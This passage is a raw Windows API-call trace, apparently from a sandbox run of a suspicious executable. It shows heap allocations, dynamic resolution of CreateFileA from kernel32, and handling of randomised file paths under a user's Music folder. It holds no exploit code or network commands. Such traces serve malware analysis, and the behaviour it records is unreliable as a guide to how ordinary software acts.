hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0182.251] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0182.252] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0182.252] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.252] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0182.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0182.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0182.252] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0182.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0182.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0182.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0182.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0182.253] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0182.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0182.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0182.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0182.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0182.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0182.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0182.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0182.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.255] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0182.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0182.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0182.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0182.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0182.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0182.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0182.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.257] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0182.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.258] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.259] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.260] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd588 [0182.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd588, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0182.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.261] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0182.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0182.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0182.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0182.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.261] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0182.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.261] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0182.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0182.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0182.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0182.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", cchWideChar=106, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 106 [0182.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6a) returned 0x906f38 [0182.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", cchWideChar=106, 